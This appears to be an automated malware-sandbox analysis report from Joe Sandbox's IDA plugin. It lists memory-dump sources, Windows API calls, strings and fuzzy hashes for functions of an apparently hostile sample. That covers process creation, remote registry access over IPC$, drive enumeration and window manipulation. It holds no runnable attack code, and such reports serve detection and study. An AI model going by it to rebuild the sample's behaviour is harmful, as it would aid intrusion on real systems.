                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue
                                                                                                                                                                                                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                                                                      • API String ID: 3030280669-22481851
                                                                                                                                                                                                                                      • Opcode ID: 6a6452884536200c43508c3be512d53325b5e7d3f6db2aa7de271777668745c3
                                                                                                                                                                                                                                      • Instruction ID: c0030e44bbfe6da39584b9492c7ac537cb31b6432a14a004ecf7609f8bd0a002
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6a6452884536200c43508c3be512d53325b5e7d3f6db2aa7de271777668745c3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9B412372C50229AFCF11EBA4EC85DEEBBB9BF04344F00512AE815B3161EB319E09CB50
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00EF48A2
                                                                                                                                                                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 00EF48A9
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00EF48BC
                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00EF48C4
                                                                                                                                                                                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 00EF48CF
                                                                                                                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 00EF48D9
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00EF48E3
                                                                                                                                                                                                                                      • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00EF48F9
                                                                                                                                                                                                                                      • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00EF4905
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                                                                                                      • String ID: static
                                                                                                                                                                                                                                      • API String ID: 2559357485-2160076837
                                                                                                                                                                                                                                      • Opcode ID: f65ef34cae141ae5b5f212900569610ad603d9e131744793b131a0597e7bfe48
                                                                                                                                                                                                                                      • Instruction ID: f1920f2a536ecf1363638c677f760f8762602e81bafe428f0ca75c462b80a4ae
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f65ef34cae141ae5b5f212900569610ad603d9e131744793b131a0597e7bfe48
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5B315A72100219AFDF129FA5DC09FEB3FA9EF89364F110211FA19A61E0C775D820DB90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00EEBA09
                                                                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00EEBA2D
                                                                                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00EEBA6D
                                                                                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00EEBA8F
                                                                                                                                                                                                                                        • Part of subcall function 00ED0D59: GetStdHandle.KERNEL32(000000F6), ref: 00ED0D78
                                                                                                                                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00EEBC0F
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000), ref: 00EEBC60
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00EEBC92
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00EEBCA3
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00EEBCB5
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00EEBCC7
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00EEBD3C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Handle$Close$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3101636085-0
                                                                                                                                                                                                                                      • Opcode ID: cf22eacbe09b0ff719f72e045acef170f8e466633e9585e941cda99c413bec24
                                                                                                                                                                                                                                      • Instruction ID: ef4f7eb3862aa6d23ad485f3128eaa481a4df4b2bf0745477f2493cebf3290b2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cf22eacbe09b0ff719f72e045acef170f8e466633e9585e941cda99c413bec24
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D6F1E0316083449FC714EF25D891B2BBBE1BF85314F18A95DF499AB2A2CB31EC05CB52
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 00ED8343
                                                                                                                                                                                                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00ED83DF
                                                                                                                                                                                                                                      • SHGetDesktopFolder.SHELL32(?), ref: 00ED83F3
                                                                                                                                                                                                                                      • CoCreateInstance.OLE32(00F00CF0,00000000,00000001,00F27E7C,?), ref: 00ED843F
                                                                                                                                                                                                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00ED84C4
                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(?,?), ref: 00ED851C
                                                                                                                                                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00ED85A7
                                                                                                                                                                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00ED85CA
                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00ED85D1
                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00ED8626
                                                                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 00ED862C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2762341140-0
                                                                                                                                                                                                                                      • Opcode ID: 993b403ef9e5a10a5f0d724864d5b47a95c33af5673889e362fae9e0a56b1103
                                                                                                                                                                                                                                      • Instruction ID: 516b7eb69df92b5a137c063f8b915a960f75ee4fd7c5c42952eec1b4a939c832
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 993b403ef9e5a10a5f0d724864d5b47a95c33af5673889e362fae9e0a56b1103
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AFC14A75A00209AFCB14DF64C984DAEBBF9FF48344B149499E41AEB361CB30ED46CB90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00EF5D6B
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EF5D7C
                                                                                                                                                                                                                                      • CharNextW.USER32(00000158), ref: 00EF5DAB
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00EF5DEC
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00EF5E02
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EF5E13
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$CharNext
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1350042424-0
                                                                                                                                                                                                                                      • Opcode ID: af0255ebe7035d9b9f13a3000004d511a0c1238d7708e99c142db91d56f5489a
                                                                                                                                                                                                                                      • Instruction ID: 477b20068fd0df6613d66e7d9cf3a8d046a12c9123f5ddb4f61ac441ade422c3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: af0255ebe7035d9b9f13a3000004d511a0c1238d7708e99c142db91d56f5489a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A7619C32A0520CAFDF119F95CC88AFF7BB9EB55328F109145FB25BA291C7718A41DB60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00EC00DE
                                                                                                                                                                                                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00EC0137
                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00EC0149
                                                                                                                                                                                                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00EC0169
                                                                                                                                                                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 00EC01BC
                                                                                                                                                                                                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00EC01D0
                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00EC01E5
                                                                                                                                                                                                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 00EC01F2
                                                                                                                                                                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00EC01FB
                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00EC020D
                                                                                                                                                                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00EC0218
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2706829360-0
                                                                                                                                                                                                                                      • Opcode ID: 30ccc4d31d4fb6f169d71142c5cddd7a864020f0af560b06a5b3eee9ad79ca2f
                                                                                                                                                                                                                                      • Instruction ID: 2b3b8f38616e28463e3841ea9fd904eddb78257b59001fce68cf6ce39c8b6a6f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 30ccc4d31d4fb6f169d71142c5cddd7a864020f0af560b06a5b3eee9ad79ca2f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E0416071A00219DFCF04DF69DC48EADBFBAEF48344F048069E955B7261C731AA46CB90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CharLowerBuffW.USER32(00000000,00000000,00EFDCD0), ref: 00ED4D77
                                                                                                                                                                                                                                      • GetDriveTypeW.KERNEL32(?,00F27C00,00000061), ref: 00ED4F93
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: BuffCharDriveLowerType
                                                                                                                                                                                                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                                                                                      • API String ID: 2426244813-1000479233
                                                                                                                                                                                                                                      • Opcode ID: 2bee9fce7c32c740370fe85cff2494ea9885954282c44eed5cc01a8b09de603d
                                                                                                                                                                                                                                      • Instruction ID: 02d07a8b414fb1e2f2faa1aab2ef4ca5e02ad960004232b0d5956e66536d1b3b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2bee9fce7c32c740370fe85cff2494ea9885954282c44eed5cc01a8b09de603d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D5B1D3B16083029FC710DF28D890A6AB7E5FFA4768F10691EF495A73E5D730D846CB92
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00EC5024
                                                                                                                                                                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00EC506A
                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(?,00000000), ref: 00EC5087
                                                                                                                                                                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00EC50F4
                                                                                                                                                                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00EC5131
                                                                                                                                                                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00EC517F
                                                                                                                                                                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00EC51B9
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00EC5229
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ClassName$Window$Text$BuffCharRectUpper
                                                                                                                                                                                                                                      • String ID: ThumbnailClass
                                                                                                                                                                                                                                      • API String ID: 3725905772-1241985126
                                                                                                                                                                                                                                      • Opcode ID: dc973dd3d1d1c5628098eb9a881709686de3c34c2203d3507451674363b55e98
                                                                                                                                                                                                                                      • Instruction ID: b171e70f1ed30a448ea80794b870681964b4f68213acbde09bb4bedfaf2fb1e6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc973dd3d1d1c5628098eb9a881709686de3c34c2203d3507451674363b55e98
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6191BE721087059FDB04CF10CA85FAA77E8EF44318F04546DFD89AA196DB31ED86CBA2
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CoInitialize.OLE32 ref: 00EE3FCD
                                                                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 00EE3FD8
                                                                                                                                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000017,00F00B60,?), ref: 00EE4032
                                                                                                                                                                                                                                      • IIDFromString.OLE32(?,?), ref: 00EE40A5
                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00EE413D
                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00EE418F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                                                                                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                                                                                      • API String ID: 636576611-1287834457
                                                                                                                                                                                                                                      • Opcode ID: e16f51bd7221b950434c493188282b8ce1deb9db91caba2be9de94c996971394
                                                                                                                                                                                                                                      • Instruction ID: e2873bb11af416ba35f047d72e287e30ab2a965292ee22fb74ea44d8a126373b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e16f51bd7221b950434c493188282b8ce1deb9db91caba2be9de94c996971394
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B61C0B1208355AFC710DF66D848FAABBE8AF88754F10181DF585AB291C770ED48CB93
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetLocalTime.KERNEL32(?), ref: 00ED8AA7
                                                                                                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00ED8AB7
                                                                                                                                                                                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00ED8AC3
                                                                                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00ED8B60
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00ED8B74
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00ED8BA6
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00ED8BDC
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00ED8BE5
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                                                                                                                                      • String ID: *.*
                                                                                                                                                                                                                                      • API String ID: 1464919966-438819550
                                                                                                                                                                                                                                      • Opcode ID: 6a27cbaf68de41fcf301c76b043126beaab6ea4afed6d1f8a62077d5773b77fb
                                                                                                                                                                                                                                      • Instruction ID: eca0c21712929674099f007d19c7eced0d1ff4afe4dfad59a890014955daeae1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6a27cbaf68de41fcf301c76b043126beaab6ea4afed6d1f8a62077d5773b77fb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B1617BB2508305AFC710EF25D9449AEB3E8FF89314F04591EF989E7251EB31E946CB92
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00ECE2DF
                                                                                                                                                                                                                                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00ECE305
                                                                                                                                                                                                                                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00ECE37B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileInfoVersion$QuerySizeValue
                                                                                                                                                                                                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                                                                                      • API String ID: 2179348866-1459072770
                                                                                                                                                                                                                                      • Opcode ID: bb31558fe8a3973fba02951fc4cabfd6982ed390a455deb17461ca2b54569f42
                                                                                                                                                                                                                                      • Instruction ID: 4d3ed5636bafbba6d6f8c3bbea53e0b717bd695b7305968d2f93baf627732158
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bb31558fe8a3973fba02951fc4cabfd6982ed390a455deb17461ca2b54569f42
